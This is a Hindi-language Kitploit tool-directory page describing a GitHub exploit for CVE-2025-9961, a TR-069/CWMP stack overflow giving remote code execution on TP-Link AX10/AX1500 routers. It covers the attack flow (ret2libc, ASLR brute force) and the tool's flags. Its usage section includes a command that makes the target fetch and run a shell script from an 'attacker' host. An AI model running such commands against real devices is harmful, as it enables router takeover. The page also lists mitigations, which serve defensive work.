Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9961 | Kitploit
उपकरण/GitHubGitHub/yt2w/cve-2025-9961
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर सुरक्षारिमोट एक्सेस टूलबाइनरी शोषण
GitHubyt2w/cve-2025-9961

CVE-2025-9961

रिपॉजिटरी देखें
617 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-9961

TP-Link AX10/AX1500 CWMP बफर ओवरफ्लो RCE

अवलोकन

CWMP (TR-069) में स्टैक-आधारित बफर ओवरफ्लो, जो रिमोट कोड निष्पादन की ओर ले जाता है।

फ़ील्डमान
उत्पादTP-Link AX10, AX1500
प्रभावितAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (उच्च)
प्रकारस्टैक बफर ओवरफ्लो
वेक्टरCWMP/TR-069 (पोर्ट 7547)
प्रभावरिमोट कोड निष्पादन

आक्रमण प्रवाह

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

तकनीकी विवरण

यह भेद्यता cwmp प्रक्रिया द्वारा SetParameterValues SOAP अनुरोधों के प्रबंधन में है। इनपुट का उपयोग बाउंड्स जाँच के बिना बफर आकार की गणना करने के लिए किया जाता है।

शोषण:

  • system() को कॉल करने के लिए ret2libc का उपयोग करें
  • ब्रूट फोर्स द्वारा ASLR बाईपास
  • सेवा के पुनः प्रारंभ होने से बार-बार प्रयास संभव होते हैं

उपयोग

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

पैरामीटर

आवश्यकताएँ

कोई नहीं (मानक लाइब्रेरी का उपयोग करता है)

शमन

  • पैच किए गए फर्मवेयर में अपडेट करें
  • TR-069/CWMP अक्षम करें
  • पोर्ट 7547 की पहुँच प्रतिबंधित करें

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए।

टूल डाउनलोड करें
फ़्लैगविवरणडिफ़ॉल्ट
-p, --portCWMP पोर्ट7547
-c, --commandRCE के लिए कमांडकोई नहीं
-t, --timeoutसॉकेट टाइमआउट10
--dosकेवल DoS मोडबंद
--check-onlyभेद्यता की जाँच करेंबंद